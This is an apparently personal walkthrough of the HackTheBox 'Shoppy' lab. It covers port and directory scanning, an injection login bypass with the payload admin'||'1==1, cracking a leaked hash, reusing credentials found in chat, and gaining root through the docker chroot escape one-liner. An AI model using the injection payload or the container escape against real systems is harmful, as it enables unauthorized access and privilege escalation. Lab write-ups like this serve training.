Shoppy | HackTheBox | Easy

---

Reconnaissance

nmap -sV -sC <target-ip>

Results

Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-15 21:13 EST
Nmap scan report for 10.10.11.180
Host is up (0.14s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 9e5e8351d99f89ea471a12eb81f922c0 (RSA)
|   256 5857eeeb0650037c8463d7a3415b1ad5 (ECDSA)
|_  256 3e9d0a4290443860b3b62ce9bd9a6754 (ED25519)
80/tcp open  http    nginx 1.23.1
|_http-title: Did not follow redirect to http://shoppy.htb
|_http-server-header: nginx/1.23.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.92 seconds

 

Look like there’s nothing much usefull!!

Directory bruteforcing

gobuster dir -b 404,301 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 500 -u http://shoppy.htb

Results:

                                                                                                       
┌──(root㉿kali/machines/shoppy-HTB)
[
└─# gobuster dir -b 404,301 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 500 -u http://shoppy.htb
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://shoppy.htb
[+] Method:                  GET
[+] Threads:                 500
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404,301
[+] User Agent:              gobuster/3.3
[+] Timeout:                 10s
===============================================================
2022/12/16 00:46:53 Starting gobuster in directory enumeration mode
===============================================================
/admin                (Status: 302) [Size: 28] [--> /login]
/login                (Status: 200) [Size: 1074]
/Login                (Status: 200) [Size: 1074]
Progress: 3984 / 220561 (1.81%)^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2022/12/16 00:46:58 Finished
===============================================================

We got login and admin page on shoppy.htb

Let’s try sqli here!

username : admin'||'1==1 password : random

Boom!! we logged in

try out again the same sqli here!

<img width="520" alt="sqli-after-admin" src="https://user-images.githubusercontent.com/95465072/208038413-8b3e3f82-e8f5-4f4f-b8d5-9a3264871104.png">


Download the transcirpt!

great! we got **josh** user's password hash

<img width="461" alt="pass-user-afteradmin-download" src="https://user-images.githubusercontent.com/95465072/208038531-1e1741e0-9ce4-438d-9de1-db802d67c5e6.png">

[crack this hash here](https://crackstation.net/)

<img width="786" alt="hash-for-josh" src="https://user-images.githubusercontent.com/95465072/208038459-27930a24-ad73-43b6-ae02-44f679fefe1e.png">


|hash|password  |
|--|--|
|  6ebcea65320589ca4f2f1ce039975995| remembermethisway |

## Subdomain Enumeration
```sh
gobuster vhost -w /usr/share/wordlists/SecLists/bitquark-subdomains-top100000.txt -t 50 -u shoppy.htb --no-error

Results:

┌──(root㉿kali)-[/usr/share/wordlists/SecLists]
└─# gobuster vhost -w /usr/share/wordlists/SecLists/bitquark-subdomains-top100000.txt -t 50 -u shoppy.htb --no-error
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:             http://shoppy.htb
[+] Method:          GET
[+] Threads:         50
[+] Wordlist:        /usr/share/wordlists/SecLists/bitquark-subdomains-top100000.txt
[+] User Agent:      gobuster/3.3
[+] Timeout:         10s
[+] Append Domain:   false
===============================================================
2022/12/16 01:08:10 Starting gobuster in VHOST enumeration mode
===============================================================
mattermost                (Status: 200) [Size: 1074]

We got the subdomain http://mattermost.shoppy.htb add this to /etc/hosts

login as josh

username josh password remembermethisway

Boom! in the comments section we got

jaeger
4:22 AM

Hey @josh,
For the deploy machine, you can create an account with these creds :
username: jaeger
password: Sh0ppyBest@pp!
And deploy on it.

Based on this comment we can try ssh

ssh jaeger@shoppy.htb

password : Sh0ppyBest@pp!

ge >

Got the user flag!!

jaeger@shoppy:~$ ls
Desktop  Music  ShoppyApp  user.txt
Documents  Pictures  shoppy_start.sh  Videos
Downloads  Public  Templates
jaeger@shoppy:~$ cat user.txt
3056a9074c4c2bd189e9************
jaeger@shoppy:~$

Privilege Escalation

sudo -l 

By this we can see that we can execute password-manager as root user!

cat /home/deploy/password-manager

sudo -u deploy /home/deploy/password-manager

Try this with ssh again

ssh deploy@shoppy.htb password : Deploying@pp!

It looks like we are in the docker container! let’s try it out with gtfobins payload for sudo

gtfobins –> docker –> sudo

docker run -v /:/mnt --rm -it alpine chroot /mnt sh

Congragulations!! got the root flag!

Root.txt

d9dd59daa7341501bb93c****************